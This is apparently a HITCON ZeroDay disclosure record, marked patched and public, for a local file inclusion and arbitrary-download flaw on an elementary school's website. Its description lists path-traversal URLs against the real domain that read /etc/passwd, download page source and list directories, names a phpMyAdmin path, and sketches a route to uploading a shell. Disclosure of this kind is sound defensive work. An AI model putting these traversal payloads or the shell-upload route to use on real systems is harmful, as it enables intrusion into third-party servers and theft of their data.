內壢國小 LFI , 任意檔案下載 , 有RCE風險 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2024-01596
  •  發信 Vendor: TACERT台灣學術網路危機處理中心
  • Title: 內壢國小 LFI , 任意檔案下載 , 有RCE風險
  • Introduction: 讀取伺服器任意檔案及任意檔案下載

處理狀態

目前狀態

公開
Last Update : 2025/01/14
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2024/12/26 19:26:04 : 新提交 (由 鄉民 更新此狀態)
  • 2024/12/26 21:36:11 : 新提交 (由 鄉民 更新此狀態)
  • 2024/12/26 22:12:03 : 新提交 (由 鄉民 更新此狀態)
  • 2024/12/30 21:46:14 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/01/03 15:08:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/01/03 15:08:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/01/06 08:15:51 : 已修補 (由 組織帳號 更新此狀態)
  • 2025/01/14 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2024-01596
  • 通報者:鄉民
  • 風險:嚴重
  • 類型:本地檔案引入 (Local File Inclusion, LFI)

參考資料

攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。

漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.nlps.tyc.edu.tw/x/
https://www.nlps.tyc.edu.tw/static/info/old/

敘述

目錄下的瀏覽功能能夠瀏覽passwd,也可瀏覽頁面原始碼
https://www.nlps.tyc.edu.tw/static/info/old/index.php?dir=../../../../../../../../../../../etc/passwd&act=V
另一個頁面的下載功能可以下載任意檔案
https://www.nlps.tyc.edu.tw/x/index.php?dir=/index.php&act=D
https://www.nlps.tyc.edu.tw/x/index.php?dir=../../../../../../../../../../../etc/passwd&act=D
接著發現如果只用../../../../可以列出目錄結構
https://www.nlps.tyc.edu.tw/static/info/old/index.php?dir=/../../../../../../

RCE風險
配合LFI能夠找到管理員帳密,加上找到的phpmyadmin頁面可能可以做到從後台上傳shell去RCE
https://www.nlps.tyc.edu.tw/pma504a/

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;